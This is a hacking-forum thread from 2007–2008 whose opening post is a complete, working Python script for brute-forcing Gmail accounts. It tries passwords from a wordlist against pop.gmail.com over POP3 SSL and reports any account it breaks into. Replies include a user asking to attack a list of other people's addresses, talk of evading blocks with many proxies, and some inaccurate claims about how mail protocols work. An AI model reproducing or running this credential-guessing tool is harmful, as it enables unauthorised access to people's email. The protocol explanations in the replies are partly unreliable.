G-mail POP Brute Force

If it doesn't fit anywhere else, it will fit here.

G-mail POP Brute Force

Postby d3hydr8 » Thu Jul 12, 2007 9:54 am

Code: Select all
#!usr/bin/python #Gmail Pop3 Brute Forcer #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import threading, time, random, sys, poplib from copy import copy def title(): print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0" print "\t --------------------------------------------------\n" if len(sys.argv) !=3: title() print "\t Usage: ./gmailpopbrute.py <userlist> <wordlist>\n" sys.exit(1) server = "pop.gmail.com" success = [] try: users = open(sys.argv[1], "r").readlines() except(IOError): title() print "[-] Error: Check your userlist path\n" sys.exit(1) try: words = open(sys.argv[2], "r").readlines() except(IOError): title() print "[-] Error: Check your wordlist path\n" sys.exit(1) try: pop = poplib.POP3_SSL(server, 995) welcome = pop.getwelcome() pop.quit() except (poplib.error_proto): welcome = "No Response" pass title() print "[+] Server:",server print "[+] Port: 995" print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "\n[-] Reloading Wordlist - Changing User\n" reloader() value = random.sample(words, 1) users.remove(users[0]) lock.release() if len(users) ==1: return value[0][:-1], users[0] else: return value[0][:-1], users[0][:-1] class Worker(threading.Thread): def run(self): value, user = getword() try: print "-"*12 print "[+] User:",user,"Password:",value pop = poplib.POP3_SSL(server, 995) pop.user(user) pop.pass_(value) print "\t\t\n\nLogin successful:",user, value print "\t\tMail:",pop.stat()[0],"emails" print "\t\tSize:",pop.stat()[1],"bytes\n\n" success.append(user) success.append(value) success.append(pop.stat()[0]) success.append(pop.stat()[1]) pop.quit() except (poplib.error_proto), msg: #print "An error occurred:", msg pass for i in range(len(words)*len(users)): work = Worker() work.start() time.sleep(1) if len(success) >=1: print "\n\n[+] Login successful:" print "\t[+] User:",success[0] print "\t[+] Password:",success[1] print "\t[+] Mail:",success[2],"emails" print "\t[+] Size:",success[3],"bytes\n" print "\n[-] Done\n"
Last edited by d3hydr8 on Sun Feb 10, 2008 5:22 pm, edited 1 time in total.
d3hydr8
n00b
 
Posts: 16
Joined: Tue Sep 26, 2006 2:36 pm
Website: http://darkcode.ath.cx
Location: 127.0.0.1

Postby korin » Thu Jul 12, 2007 11:57 am

umm . . . shouldn't this be in "post your source" in the programming section?
User avatar
korin
Guru
 
Posts: 592
Joined: Wed Nov 08, 2006 5:51 pm

Postby acehart » Wed Aug 01, 2007 10:59 pm

with your code i can try to brute force some of these accounts?:

[List of e-mail addresses removed - not to mention, non-Gmail addresses :roll:]
acehart
Strike 1
 
Posts: 1
Joined: Wed Aug 01, 2007 10:57 pm

Postby GhostHawk » Thu Aug 02, 2007 9:57 am

Looks like someone didn't read the rules. Shame shame. Sometimes I miss my modly powers.
Opinions are like ass holes, everyone has one. It is also my opinion, that I am an ass hole.
User avatar
GhostHawk
Ex-Mod
 
Posts: 1447
Joined: Wed Jul 30, 2003 12:10 am
ICQ: 231821255
Website: http://www.xpango.com?ref=91423378

Postby TheConfusedEgo » Thu Aug 02, 2007 10:25 am

I miss your mod powers too.

Luckily for us, I still have mine.

Luckily for him, he's getting a chance to learn from this mistake, which I'd guess you might not have given him ;)
TheConfusedEgo
Otaku
 
Posts: 2629
Joined: Sat Sep 27, 2003 6:25 am

Postby hormesis » Thu Aug 02, 2007 6:46 pm

I miss my mod powers, too.

Oh wait..
User avatar
hormesis
Veteran
 
Posts: 679
Joined: Wed May 17, 2006 3:27 pm
Location: irc.tddirc.net #hackerthreads

sup guys

Postby newber » Thu Nov 22, 2007 12:24 am

where can i learn how to read, understand and use this code? is this something newbs shouldnt get in to?
newber
n00b
 
Posts: 3
Joined: Sun Nov 18, 2007 7:24 am

Postby Rick » Thu Nov 22, 2007 12:39 am

find a book on python or you can search the web for python tutorials. a great place to start would be http://www.python.org
Rick
Hacker in Training
 
Posts: 86
Joined: Mon Oct 15, 2007 11:55 am
Location: Raleigh,NC

Blocked access

Postby qu4ntumCyp|-|3r » Fri Jan 18, 2008 12:24 pm

Won't trying a brute force on GMail's pop3 get you blocked? Sure they've covered this attack... The guys at google would not likely have left that loop hole open?

Or am I wrong?
qu4ntumCyp|-|3r
n00b
 
Posts: 2
Joined: Fri Jan 18, 2008 6:22 am
Location: Costa Rica

Postby stasik » Fri Jan 18, 2008 1:44 pm

by default pop3 is disabled on gmail accounts. if somehow u enable it maybe it would work.but i m sure brutus will do it faster. in yahoo u have to pay for pop service...
User avatar
stasik
Guru
 
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Postby IceDane » Fri Jan 18, 2008 8:38 pm

by default pop3 is disabled on gmail accounts. if somehow u enable it maybe it would work.but i m sure brutus will do it faster. in yahoo u have to pay for pop service...
It isn't disabled - they use port 995 for POP, and also use SSL, so brute-forcing will be a problem with the average brute-forcer, at least.
User avatar
IceDane
Because I Can
 
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Postby stasik » Sat Jan 19, 2008 6:02 am

on my gmail account it was disabled...
User avatar
stasik
Guru
 
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Postby IceDane » Sat Jan 19, 2008 7:17 am

on my gmail account it was disabled...
No, it wasn't, cause you wouldn't be able to receive mail if it were so.
User avatar
IceDane
Because I Can
 
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Postby stasik » Sat Jan 19, 2008 1:38 pm

it definitely was off. i turned it on when i was using mail forwarding. how yahoo mail dont have pop but u still receive mails? there are only a few mail providers which provide pop for free. in other it costs, other dont even have the service...but maybe it was off by accident. even if it is on,it is hard to bruteforce it. would be much easier knowing character set
User avatar
stasik
Guru
 
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Postby Aiden » Sat Jan 19, 2008 2:06 pm

It's on on all email providers, they just don't allow you to access it directly sometimes, and sometimes you pay to access it.
A POP3 (Post Office Protocol) server is used to store email messages.
"When it takes forever to learn all the rules, no time is left for breaking them."
User avatar
Aiden
Administrator
 
Posts: 1080
Joined: Tue Oct 31, 2006 11:11 pm
Location: /usr/bin/perl

Postby stasik » Sat Jan 19, 2008 3:03 pm

i thought they use smtp protocol. and then u want co connect remotely, pop is used...
User avatar
stasik
Guru
 
Posts: 525
Joined: Thu Oct 12, 2006 8:38 am
Location: dublin

Postby Aiden » Sat Jan 19, 2008 3:24 pm

They use SMTP as well. SMTP is the protocol for sending mail, while pop3 is for receiving it.
"When it takes forever to learn all the rules, no time is left for breaking them."
User avatar
Aiden
Administrator
 
Posts: 1080
Joined: Tue Oct 31, 2006 11:11 pm
Location: /usr/bin/perl

Postby IceDane » Sat Jan 19, 2008 5:44 pm

i thought they use smtp protocol. and then u want co connect remotely, pop is used...
Like Dru said, they use SMTP for sending mail while POP3 receives it. They could also use another protocol called IMAP for receiving it, but they don't.
User avatar
IceDane
Because I Can
 
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Hmmmm....

Postby qu4ntumCyp|-|3r » Sun Jan 20, 2008 2:14 am

Appears they do:
IMAP Access:
(access Gmail from other clients using IMAP)
Learn more
1. Status: IMAP is enabled
Enable IMAP
Disable IMAP
I'm just interested to know if a brute force attack would even work... Sure your IP would be blocked shortly after you started it...

Or if you had... 1000 proxy servers (yeah I know highly unlikely).. All trying a user/pass combination in succession...

Hmmm.... :/
qu4ntumCyp|-|3r
n00b
 
Posts: 2
Joined: Fri Jan 18, 2008 6:22 am
Location: Costa Rica

Re: G-mail POP Brute Force

Postby blhack » Thu Jul 03, 2008 1:13 pm

I registered just to respond to this....


SMTP is used for both sending and recieving mail. Like FTP is used for both sending and recieving files. This is why when setting up a mail server, it is required to open port 25 to the server. If smtp was used for only sending messages, this would not be the case (firewall states would take care of this).

When email originated, you logged in to the machine in order to read your mail (like the program "mail" on bsd). It was something stored (usually in your home directory[~/.MailDir) that you would read when logging in.

Pop3 and IMAP are both protocols that came around later when "Mailservers" started to come about. Pop3 and IMAP are protocols that allow a mail client running on your local machine to log in to the remote server and download your mail for you.

I know this because I run SMTP (on qmail) on almost all of my machines.
blhack
n00b
 
Posts: 1
Joined: Thu Jul 03, 2008 1:07 pm


Return to ā€œ%sā€ General

Who is online

Users browsing this forum: No registered users and 0 guests

cron